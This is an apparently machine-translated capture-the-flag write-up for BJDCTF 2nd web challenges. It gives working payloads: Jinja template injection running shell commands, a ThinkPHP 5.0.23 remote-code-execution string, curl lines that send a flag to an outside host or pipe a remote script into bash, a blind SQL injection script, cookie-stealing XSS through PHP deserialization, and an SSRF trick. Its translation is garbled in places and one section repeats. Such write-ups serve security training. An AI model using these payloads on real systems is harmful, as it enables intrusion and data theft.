BDJCTF 2nd web

fakegoogle

SSTI

{{ config.__class__.__init__.__globals__['os'].popen('BJD;cat /flag').read() }}

old-hack

tp5.0.23

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

duangShell

.index.php.swp leak

curl ip: port`tac / flag` or curl ip port | bash

Simple injection

Filter the single quotation marks, select, mid, and, = commonly used characters and the like, the following idea:

by \ username escape single quotes, leading to escapes password


echo different, each blind:

import requests
import string
url='http://ec358d69-8850-46e2-9f03-63fa94c4cb6b.node3.buuoj.cn/index.php'
text=''
for i in range(1,40):
    l=28
    h=126
    while abs(h - l) > 1:
        m=(l+h)/2
        payload='^ (ascii(substr((password),{},1))>{})#'
        data={
            'username':'admin\\',
            'password':payload.format(i,m)
        }
        re=requests.post(url,data=data)
        #print(re.text)
        if 'P3rh4ps' in re.text:
            l=m
        else:
            h=m
    mid_num = int((l + h + 1) / 2)
    text += chr(int(h))
    print(text)

Fake pig sets best in the world

Ethereal has a hint

of time replaced with a time stamp, ua head, then this site quite wide: https://www2.sal.tohoku.ac.jp/~gothit/ua.html

Schrödinger

This is something similar to a blast password, you enter the URL will help you blast, then the higher the success rate of long time, and 100 will be blasting is completed, then the direct blast test.php, and then replace the cookie, the timestamp + Base64
LTMwODU2ODY3Nw ==

result b av station No.

Schrödinger

This is something similar to a blast password, you enter the URL will help you blast, then the higher the success rate of long time, and 100 will be blasting is completed, then the direct blast test.php, and then replace the cookie, the timestamp + base64

xss Light

.git leak

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

hint pop-up cookie, where you can use the native exception of class php

<?php
$a = new Exception("<script>alert(document.cookie)</script>");
//echo serialize($a);
echo urlencode(serialize($a));

Or directly

echo urlencode(serialize("<script>alert(document.cookie)</script>"));

Posted a link:
http://blog.ydspoplar.top/2020/03/17/php%E5%8F%AF%E5%88%A9%E7%94%A8%E7%9A%84%E5%8E% 9F% E7% 94% 9F% E7% B1% BB /

elements master

This problem a little brain-dong

import requests
url = 'http://7c60a665-40e4-4641-b6aa-81e151788526.node3.buuoj.cn/{}.php'
s = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar','K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr','Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
text = ''
for i in s:
    r = requests.get(url=url.format(i))
    if r.status_code != 404:
        print(i)
        text += r.text
        # print(r.text)
        print(text)

File detection

home.php index.php ahead discovery

pseudo-protocol file read:
system.php:

<?php

$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';


if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
    $url = $_POST['q2'].".y1ng.txt";
    $method = $_POST['q3'];

    $str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";

    echo $str1;

    if (!preg_match($filter1, $url) ){
        die($str2);
    }
    if (preg_match($filter2, $url)) {
        die($str3);
    }
    if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
        die($str4);
    }
    $detect = @file_get_contents($url, false);
    print(sprintf("$url method&content_size:$method%d", $detect));
}
?>

home.php

<?php
setcookie("y1ng", sha1(md5('y1ng')), time() + 3600);
setcookie('your_ip_address', md5($_SERVER['REMOTE_ADDR']), time()+3600);
if(isset($_GET['file'])){
    if (preg_match("/\^|\~|&|\|/", $_GET['file'])) {
        die("forbidden");
    }
    if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
        die("not now!");
    }
    if(preg_match("/.?a.?d.?m.?i.?n.?/i", $_GET['file'])){
        die("You! are! not! my! admin!");
    }
    if(preg_match("/^home$/i", $_GET['file'])){
        die("禁止套娃");
    }
    else{
        if(preg_match("/home$/i", $_GET['file']) or preg_match("/system$/i", $_GET['file'])){
            $file = $_GET['file'].".php";
        }
        else{
            $file = $_GET['file'].".fxxkyou!";
        }
        echo "现在访问的是 ".$file . "<br>";
        require $file;
    }
} else {
    echo "<script>location.href='./home.php?file=system'</script>";
}

First admin.php

need ssrf

system.php accepts three parameters:
Ql: futile
q2: url file access, and only at the beginning of http://127.0.0.1/, then spliced on y1ng.txt
Q3: parameter passing mode, only to get or post at the beginning of
last file_get_contents () and then sprint output

q1=w4nder&q2=http://127.0.0.1/admin.php?s=&q3=get %s%

Get admin.php Source:

<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake

function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

function Check()
{
    if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
        return true;
    else
        return false;
}

if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} else {
    echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}


$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);

if (isset($_GET['decrypt'])) {
    $decr = $_GET['decrypt'];
    if (Check()){
        $data = $_SESSION['secret'];
        include 'flag_2sln2ndln2klnlksnf.php';
        $cipher = aesEn($data, 'y1ng');
        if ($decr === $cipher){
            echo WHAT_YOU_WANT;
        } else {
            die('爬');
        }
    } else{
        header("Refresh:0.1;url=index.php");
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));
    $length = mt_rand(40,80);
    $_SESSION['secret'] = bin2hex(random_bytes($length));
}
?>

Incoming desrypt, need = aesEn ($ _ SESSION [ ' secret'], 'y1ng'), $ _ SESSION [ 'secret'] is randomly generated, initially this comment cheated (// I heard you can break PHP mt_rand seed), that with a pseudo-random number related to, but not random_bytes function really get, then think of this assignment under else, just make sure not to feed else circulation so $ _SESSION [ 'secret'] on = null: the

get: 70klfZeYC + WlC045CcKhtg = =, url encoding